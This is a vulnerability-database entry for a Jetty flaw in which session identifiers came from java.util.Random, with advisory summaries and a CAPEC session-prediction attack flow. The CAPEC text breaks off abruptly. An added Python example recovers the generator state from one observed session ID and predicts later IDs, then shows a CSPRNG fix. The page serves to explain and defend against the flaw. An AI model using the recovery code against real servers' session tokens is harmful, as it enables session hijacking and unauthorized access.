CVE-2006-6969
Published 2007-02-07
Priority: P4 · 24 · medium · CVSS 2.0 base score 6.8
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EPSS: 1.56% (72.1st percentile)
Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possibly conduct cross-site request forgery attacks.
Affected
13 ranges (the per-version CPE entries did not render; the ranges below are the ones stated in the description)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jetty | jetty_http_server | < 4.2.27 | 4.2.27 |
| jetty | jetty_http_server | 5.1.x < 5.1.12 | 5.1.12 |
| jetty | jetty_http_server | 6.0.x < 6.0.2 | 6.0.2 |
| jetty | jetty_http_server | 6.1.x < 6.1.0pre3 | 6.1.0pre3 |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 6.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |
| vendor_redhat | — | 6.8 | MEDIUM | — |
GHSA
Jetty Uses Predictable Session Identifiers
ghsa · 2022-05-01 · MEDIUM · CWE-330 (Use of Insufficiently Random Values)
Description identical to the CVE text above.
OSV
Jetty Uses Predictable Session Identifiers
osv · 2022-05-01 · MEDIUM
Description identical to the CVE text above.
Red Hat
jetty: session identifiers session hijacking
vendor_redhat · 2006-11-22 · CVSS 6.8 · MEDIUM · CWE-340 (Generation of Predictable Numbers or Identifiers)
Description identical to the CVE text above.
A flaw was found in Jetty that could allow a remote attacker to hijack a valid user's session. Jetty generated session identifiers with "java.util.Random", a seedable linear congruential generator whose internal state, and therefore all of its later output, can be recovered from a small number of observed values; it is not a cryptographically secure source. Because the session identifiers followed directly from that predictable output, a remote attacker who observed identifiers issued by the server could predict a victim's session identifier, hijack the session and gain unauthorized access to the application.
Package: jetty (Red Hat Enterprise Linux 7) - Not affected
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
CAPEC
CAPEC-59: Session Credential Falsification through Prediction
mitre_capec · likelihood HIGH
This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.
Execution Flow:
Step 1 [Explore]: [Find Session IDs] The attacker interacts with the target host and finds that session IDs are used to authenticate users.
Technique: An attacker makes many anonymous connections and records the session IDs assigned.
Technique: An attacker makes authorized connections and records the session tokens or credentials issued.
Step 2 [Explore]: [Characterize IDs] The attacker studies the characteristics of the session ID (size, format, etc.). As a result, the attacker finds that legitimate session IDs are predictable.
Tech
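As an added worked example (not Jetty's code and not taken from any of the advisories above), the Python script below models the weakness behind this CVE and the CAPEC-59 flow: it re-implements the 48-bit linear congruential generator of java.util.Random bit for bit, issues session identifiers from nextLong(), and shows that a single observed identifier is enough to recover the generator's state and predict every identifier issued afterwards. The identifier format (one nextLong() rendered as 16 hex digits), the server seed and the helper names are assumptions made for illustration; Jetty's real identifier layout is not reproduced. The hardened form at the end uses a CSPRNG, which in Java means java.security.SecureRandom and here Python's secrets module.

```python
"""
Why session IDs drawn from java.util.Random are predictable (model of CVE-2006-6969,
not Jetty's actual ID format): one observed ID recovers the generator state.
"""
import secrets

# java.util.Random is a 48-bit LCG; these constants are documented in its javadoc.
MULT = 0x5DEECE66D
ADD = 0xB
MASK48 = (1 << 48) - 1
MASK64 = (1 << 64) - 1


class JavaRandom:
    """Bit-exact re-implementation of java.util.Random: seeding, next(bits), nextInt, nextLong."""

    def __init__(self, seed):
        # Random(long seed) scrambles the seed with the multiplier before first use.
        self.state = (seed ^ MULT) & MASK48

    @classmethod
    def from_state(cls, state):
        # Attacker's constructor: start from a recovered internal state, no scrambling.
        obj = cls.__new__(cls)
        obj.state = state & MASK48
        return obj

    def _next(self, bits):
        self.state = (self.state * MULT + ADD) & MASK48
        return self.state >> (48 - bits)

    def next_int(self):
        v = self._next(32)
        return v - (1 << 32) if v >= (1 << 31) else v  # Java int is signed

    def next_long(self):
        hi = self.next_int()
        lo = self.next_int()
        v = ((hi << 32) + lo) & MASK64                   # Java long arithmetic wraps at 64 bits
        return v - (1 << 64) if v >= (1 << 63) else v


def weak_session_id(rng):
    """Assumed weak ID format: one nextLong() printed as 16 hex digits."""
    return f"{rng.next_long() & MASK64:016x}"


def recover_predictor(observed_id):
    """Rebuild the server's java.util.Random state from ONE observed weak ID.

    nextLong() leaks two consecutive next(32) outputs, i.e. the top 32 bits of two
    consecutive 48-bit states. Only the low 16 bits of the first state are unknown,
    so 2**16 candidates are tried and checked against the second output.
    """
    u = int(observed_id, 16)
    lo_u = u & 0xFFFFFFFF
    lo_s = lo_u - (1 << 32) if lo_u >= (1 << 31) else lo_u   # undo Java's signed addition
    hi_u = ((u - lo_s) & MASK64) >> 32
    for low16 in range(1 << 16):
        s1 = (hi_u << 16) | low16
        s2 = (s1 * MULT + ADD) & MASK48
        if (s2 >> 16) == lo_u:
            return JavaRandom.from_state(s2)  # now in lock-step with the server's generator
    return None


def strong_session_id():
    """Hardened form: a CSPRNG (SecureRandom in Java, secrets here) with 128 bits of entropy."""
    return secrets.token_hex(16)


def demo(seed=42, n=3):
    """Observe one ID from a seeded 'server', predict the next n, and return (predicted, actual)."""
    server = JavaRandom(seed)               # constructed sample: a server seeded with `seed`
    observed = weak_session_id(server)      # the one ID the attacker sees (e.g. their own cookie)
    attacker = recover_predictor(observed)
    predicted = [weak_session_id(attacker) for _ in range(n)]
    actual = [weak_session_id(server) for _ in range(n)]
    return predicted, actual


if __name__ == "__main__":
    pred, act = demo()
    print("predicted:", pred)
    print("actual:   ", act)
    print("match:", pred == act)
    print("strong id:", strong_session_id())
```

The brute force checks a 32-bit value against 2**16 candidates, so a false match is about a 2**-16 event; in practice one identifier is enough, and a second one removes any ambiguity. Note what this implies for the CAPEC flow above: the attacker's "many anonymous connections" are not even required, and no amount of hashing or base-36 encoding of the raw output helps once the state is known. The only fix is the one Jetty shipped, drawing the identifier from a cryptographically secure generator.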
References
http://archives.neohapsis.com/archives/bugtraq/2007-02/0070.html
http://fisheye.codehaus.org/changelog/jetty/?cs=1274
http://osvdb.org/33108
http://secunia.com/advisories/24070
http://www.securityfocus.com/archive/1/459164/100/0/threaded
http://www.securityfocus.com/bid/22405
http://www.vupen.com/english/advisories/2007/0497
https://exchange.xforce.ibmcloud.com/vulnerabilities/32240